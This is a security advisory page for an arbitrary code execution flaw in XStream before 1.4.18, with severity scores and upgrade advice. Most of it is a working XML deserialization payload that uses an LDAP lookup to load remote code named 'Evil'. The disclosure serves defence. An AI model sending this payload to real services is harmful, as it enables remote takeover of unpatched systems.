Arbitrary Code Execution Affecting com.thoughtworks.xstream:xstream package, versions [,1.4.18)
Snyk CVSS
Attack Complexity
High
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
1.93% (89th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569187
- published 24 Aug 2021
- disclosed 24 Aug 2021
- credit Li4n0
Introduced: 24 Aug 2021
CVE-2021-39145 Open this link in a new tabHow to fix?
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
<soapPart/>
<mm>
<it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
<homeCtx>
<hostname>233.233.233.233</hostname>
<port__number>2333</port__number>
<clnt class='com.sun.jndi.ldap.LdapClient'/>
</homeCtx>
<hasMoreCalled>true</hasMoreCalled>
<more>true</more>
<posn>0</posn>
<limit>1</limit>
<entries>
<com.sun.jndi.ldap.LdapEntry>
<DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>
<attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ignoreCase>false</ignoreCase>
</default>
<int>4</int>
<javax.naming.directory.BasicAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>objectClass</attrID>
</default>
<int>1</int>
<string>javanamingreference</string>
</javax.naming.directory.BasicAttribute>
</javax.naming.directory.BasicAttribute>
<javax.naming.directory.BasicAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaCodeBase</attrID>
</default>
<int>1</int>
<string>http://127.0.0.1:2333/</string>
</javax.naming.directory.BasicAttribute>
</javax.naming.directory.BasicAttribute>
<javax.naming.directory.BasicAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaClassName</attrID>
</default>
<int>1</int>
<string>refClassName</string>
</javax.naming.directory.BasicAttribute>
</javax.naming.directory.BasicAttribute>
<javax.naming.directory.BasicAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaFactory</attrID>
</default>
<int>1</int>
<string>Evil</string>
</javax.naming.directory.BasicAttribute>
</javax.naming.directory.BasicAttribute>
</javax.naming.directory.BasicAttribute>
</attributes>
</com.sun.jndi.ldap.LdapEntry>
</entries>
</aliases>
</it>
</mm>
</multiPart>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
XStream xstream = new XStream();
xstream.fromXML(xml);